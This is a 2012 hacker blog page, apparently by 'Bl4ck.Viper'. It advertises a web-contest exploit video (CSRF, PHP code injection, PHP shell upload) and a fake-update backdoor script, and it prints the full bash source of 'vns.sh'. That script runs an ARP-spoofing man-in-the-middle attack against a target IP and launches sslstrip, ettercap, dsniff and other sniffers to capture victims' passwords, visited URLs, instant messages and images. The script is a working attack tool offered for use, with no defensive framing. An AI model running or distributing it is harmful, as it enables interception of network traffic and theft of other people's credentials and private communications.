Cyber White Hat Contest Bypass Video
Step 1-2 = Bypass Redirect Page
Step 2 = Bypass & Exploit CSRF Vulnerability
Step 3 = Exploit PCI (PHP Code Injection) Vulnerability and Find Step4 Link Location
Step 4 = Bypass Image Uploader And Inject PHP Shell
Download Video : http://www.mediafire.com/?0cvu5c2i9hv12u6
Watch Online : http://www.youtube.com/watch?v=X2LGO2hANrw
Sunday, February 19, 2012
Tuesday, February 7, 2012
Viper FakeUpdate Script
[Video & Script]Viper FakeUpdate Script
Viper FakeUpdate Script Is a simple tools for create :
dnsspoof
arpspoof
create executable backdoor with metasploit
and show fakeupdate page in victim browser
Download Video : http://www.mediafire.com/?uu5eduswa0dilri
Download Script : http://www.mediafire.com/?6881ssc5vn8a39o
Watch Online : http://www.youtube.com/watch?v=-z6axDmpK1o
Viper FakeUpdate Script Is a simple tools for create :
dnsspoof
arpspoof
create executable backdoor with metasploit
and show fakeupdate page in victim browser
Download Video : http://www.mediafire.com/?uu5eduswa0dilri
Download Script : http://www.mediafire.com/?6881ssc5vn8a39o
Watch Online : http://www.youtube.com/watch?v=-z6axDmpK1o
Thursday, February 2, 2012
Viper Network Sniffer Script [vns.sh]
hi guys
this is a simple script to run all sniffer's on backtrack linux, and sniff victim
description :
sniff all text of messengers
sniff victim url's
sniff victim password [ettercap,dsniff]
sniff HTTP/SSL with sslstrip
....
Screenshot : http://s1.picofile.com/file/7278200000/vns.png
this is a simple script to run all sniffer's on backtrack linux, and sniff victim
description :
sniff all text of messengers
sniff victim url's
sniff victim password [ettercap,dsniff]
sniff HTTP/SSL with sslstrip
....
#!/bin/bash #(C)opyright ~ 2012 Bl4ck.Viper #www.bl4ck-viper.blogspot.com ~ Bl4ck.viper@Gmail.com #TBH Security Center # #Licence For BackTrack 5 #With this script you can Sniff your network very easy #sniffers: # urlsnarf => sniff target URL's # Driftnet => Sniff target Images # Dsniff => sniff target passwords # msgsnarf => sniff target IM [messengers] # Ettercap => sniff target passwords # SSLStrip => sniff HTTP/SSL # #--------------# scriptname=$0 targetip=$1 #--------------# # Settings "you can change this" export v_interface="eth0" # interface name export v_getway="192.168.1.1" # getway IP address #--------------# export v_version="Version 1.0.1" # current version export xterm="xterm" #--------------# function v_start(){ # Port Forwarding echo -e '\E[32m'"[+]Viper Network Sniffer Script"; tput sgr0 echo -e '\E[32m'"[+]Coded By Bl4ck.Viper"; tput sgr0 echo -e '\E[32m'"[+]TBH Security Center"; tput sgr0 sleep 2 echo -e '\E[32m'"[+]Setting Up ..."; tput sgr0 $xterm -geometry 75x10+10+0 -T "[VNS] v.$v_version - Terminating Other Arpspoof Process" -e "killall arpspoof" & #kill all the arpspoof sleep 2 $xterm -geometry 75x10+10+0 -T "[VNS] v.$v_version - Port Forwarding" -e "echo 1 > /proc/sys/net/ipv4/ip_forward" & #Ip Forwarding sleep 2 $xterm -geometry 75x10+10+0 -T "[VNS] v.$v_version - Port Forwarding" -e "iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000" & #setting up iptable echo -e '\E[32m'"[+]OK"; tput sgr0 # Starting Sniffers ... echo -e '\E[33m'"[+]Starting MITM Attack"; tput sgr0 sleep 1 # step 1 : start MITM attack ... $xterm -geometry 75x8+10+120 -T "[VNS] v.$v_version - Starting The MITM Attack..." -e "arpspoof -i $v_interface -t $targetip $v_getway" & #Start the MITM sleep 3 echo -e '\E[33m'"[+]Starting Sinffers ..."; tput sgr0 $xterm -geometry 75x10+10+10 -T "[VNS] v.$v_version - Sniffing HTTP/SSL" -e "python /pentest/web/sslstrip/sslstrip.py -a -k -f" & # Sniff HTTP/SSL echo -e '\E[32m'"[+]SSLStrip Started."; tput sgr0 sleep 2 $xterm -geometry 75x10+10+10 -T "[VNS] v.$v_version - Sniffing Passwords [ettercap]" -e "ettercap -T -q -i $v_interface" & # Sniff target passwords sleep 2 echo -e '\E[32m'"[+]Ettercap Started."; tput sgr0 echo -e '\E[32m'"[+]Starting All Sniffers ..."; tput sgr0 sleep 1 $xterm -geometry 75x10+10+0 -T "[VNS] v.$v_version - Sniffing URL's ..." -e "urlsnarf -i $v_interface" & # Sniff target URL's sleep 1 $xterm -geometry 75x10+10+155 -T "[VNS] v.$v_version - Sniffing Passwords [1] ..." -e "dsniff -i $v_interface" & # Sniff target passwords sleep 1 $xterm -geometry 75x10+10+310 -T "[VNS] v.$v_version - Sniffing IM ..." -e "msgsnarf -i $v_interface" & # Sniff Target Messengers sleep 1 $xterm -geometry 75x10+10+465 -T "[VNS] v.$v_version - Sniffing Images ..." -e "driftnet -i $v_interface" & # Sniff target Images sleep 1 echo -e '\E[35m'"[+]All Sniffers Started ..."; tput sgr0 } function v_help() { clear echo -e '\E[32m'"[>] Welcome To Viper Network Sniffer"; tput sgr0 echo -e '\E[32m'"[>] Coded By Bl4ck.Viper"; tput sgr0 echo -e '\E[32m'"[>] TBH Security Center"; tput sgr0 echo "" echo -e '\E[32m'"[>] Usage : ./vns.sh [TargetIP]"; tput sgr0 echo -e '\E[35m'"[>] Notic : Set Your Network Information In Source Code (Setting Section)"; tput sgr0 } if [ "$targetip" ]; then v_start; else v_help; fi #Coded By Bl4ck.Viper #TBH Security Center
Screenshot : http://s1.picofile.com/file/7278200000/vns.png
Subscribe to:
Posts (Atom)